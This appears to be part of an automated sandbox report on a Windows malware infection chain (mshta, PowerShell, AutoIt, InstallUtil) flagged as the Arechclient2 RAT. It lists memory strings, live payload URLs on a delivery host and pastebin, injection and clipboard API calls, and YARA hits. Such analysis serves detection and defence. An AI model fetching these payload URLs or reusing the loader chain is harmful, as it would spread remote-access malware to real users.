                    Source: powershell.exe, 00000007.00000002.2286266487.00000186D0AC0000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2231897004.0000000000529000.00000002.00000001.01000000.0000000F.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2355136539.0000000000A49000.00000002.00000001.01000000.00000010.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000000.2422491840.0000000000A49000.00000002.00000001.01000000.00000010.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: powershell.exe, 00000003.00000002.2101472829.0000027A67D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                    Source: powershell.exe, 00000003.00000002.2101472829.0000027A67D49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2094500241.000001F68005C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2094500241.000001F680049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: powershell.exe, 00000007.00000002.2278172085.00000186C8904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000007.00000002.2278172085.00000186C8904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000007.00000002.2278172085.00000186C8904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: svchost.exe, 00000006.00000003.2122310774.0000019B58C13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                    Source: svchost.exe, 00000006.00000003.2122310774.0000019B58BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186B897B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: mshta.exe, 00000005.00000003.2293225799.000001965B62E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306117201.000001965B62E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2307115085.000001965B62F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: powershell.exe, 00000007.00000002.2278172085.00000186C87C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2278172085.00000186C8904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: InstallUtil.exe, 0000000F.00000002.2359029068.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/nGmga9WQ
                    Source: InstallUtil.exe, 0000000F.00000002.2359029068.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/nGmga9WQPO
                    Source: powershell.exe, 00000004.00000002.2094500241.000001F6804AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2094500241.000001F680508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.hea
                    Source: powershell.exe, 00000004.00000002.2094500241.000001F6804AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.heaX
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-st
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA16C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemav
                    Source: powershell.exe, 00000003.00000002.2101472829.0000027A681F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA6C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B897B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com
                    Source: mshta.exe, 00000005.00000003.2293225799.000001965B62E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306117201.000001965B62E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2307115085.000001965B62F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/
                    Source: mshta.exe, 00000005.00000003.2293225799.000001965B62E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306117201.000001965B62E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2307115085.000001965B62F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/G
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/09125451
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164
                    Source: mshta.exe, 00000005.00000003.2294457547.000001965B5AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4
                    Source: powershell.exeString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4$global:?
                    Source: mshta.exe, 00000005.00000003.2306370988.000001965B5B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2306996383.000001965B5B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2294457547.000001965B5AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4%8
                    Source: mshta.exe, 00000005.00000003.2293225799.000001965B622000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2293478722.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2307087883.000001965B622000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306117201.000001965B622000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2299199723.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2294593006.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2308386652.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2300152944.0000019E5E250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4...
                    Source: mshta.exe, 00000005.00000002.2308975410.0000019E62238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4/
                    Source: mshta.exe, 00000005.00000002.2307063407.000001965B609000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2293225799.000001965B607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp42
                    Source: mshta.exe, 00000005.00000003.2304861554.0000019E62830000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4485
                    Source: mshta.exe, 00000005.00000003.2304861554.0000019E62830000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp46
                    Source: mshta.exe, 00000005.00000002.2309416176.0000019E62B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp46q
                    Source: mshta.exe, 00000005.00000003.2294395378.000001965B667000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2299822414.000001965B667000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2306851846.000001965B570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2293225799.000001965B638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2307190695.000001965B668000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2293344862.000001965B665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4C:
                    Source: mshta.exe, 00000005.00000002.2306830557.000001965B560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4H
                    Source: powershell.exe, 00000004.00000002.2097708707.000001F6F90A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4Open
                    Source: mshta.exe, 00000005.00000002.2307288509.000001965B890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4System32
                    Source: mshta.exe, 00000005.00000002.2307087883.000001965B622000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306117201.000001965B622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4e
                    Source: mshta.exe, 00000005.00000003.2304540391.0000019E623E5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2304540391.0000019E623ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4https://pict.healthclinic-stylem
                    Source: powershell.exe, 00000004.00000002.2094500241.000001F680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4p
                    Source: mshta.exe, 00000005.00000003.2300521591.0000019E5E257000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2293478722.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2299941471.0000019E5E256000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2299199723.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2308415549.0000019E5E257000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2294593006.0000019E5E250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4pia
                    Source: mshta.exe, 00000005.00000002.2306851846.000001965B58A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4t
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/n
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/nnn.bin
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/nnn.binp
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/u.bin
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownHTTPS traffic detected: 172.67.223.31:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.223.31:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004D4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_004D4632
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004D4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_004D4830
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009F4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,14_2_009F4830
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004D4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_004D4632
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C0508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,11_2_004C0508
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004ED164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_004ED164
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_00A0D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,14_2_00A0D164
                    Source: Yara matchFile source: Process Memory Space: updater.exe PID: 3780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 7128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 3580, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01343D39 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,11_2_01343D39

                    System Summary

                    barindex
                    Source: 14.2.AutoIt3.exe.442c974.1.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 11.2.updater.exe.417c974.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 11.2.updater.exe.417c974.1.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 16.2.AutoIt3.exe.3d1c974.1.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 16.2.AutoIt3.exe.3d1c974.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 14.2.AutoIt3.exe.442c974.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 6524, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\47891652\updater.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_013471C1 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,11_2_013471C1
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0176BA31 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,14_2_0176BA31
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C4254: CreateFileW,DeviceIoControl,CloseHandle,11_2_004C4254
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004B8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_004B8F2E
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_004C5778
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009E5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,14_2_009E5778
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8476F24D87_2_00007FF8476F24D8
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0046B02011_2_0046B020
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0046166311_2_00461663
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00469C8011_2_00469C80
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004823F511_2_004823F5
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004E840011_2_004E8400
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0049650211_2_00496502
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0049265E11_2_0049265E
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0046E6F011_2_0046E6F0
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0048282A11_2_0048282A
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004989BF11_2_004989BF
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00496A7411_2_00496A74
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004E0A3A11_2_004E0A3A
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0048CD5111_2_0048CD51
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004BEDB211_2_004BEDB2
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C8E4411_2_004C8E44
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004E0EB711_2_004E0EB7
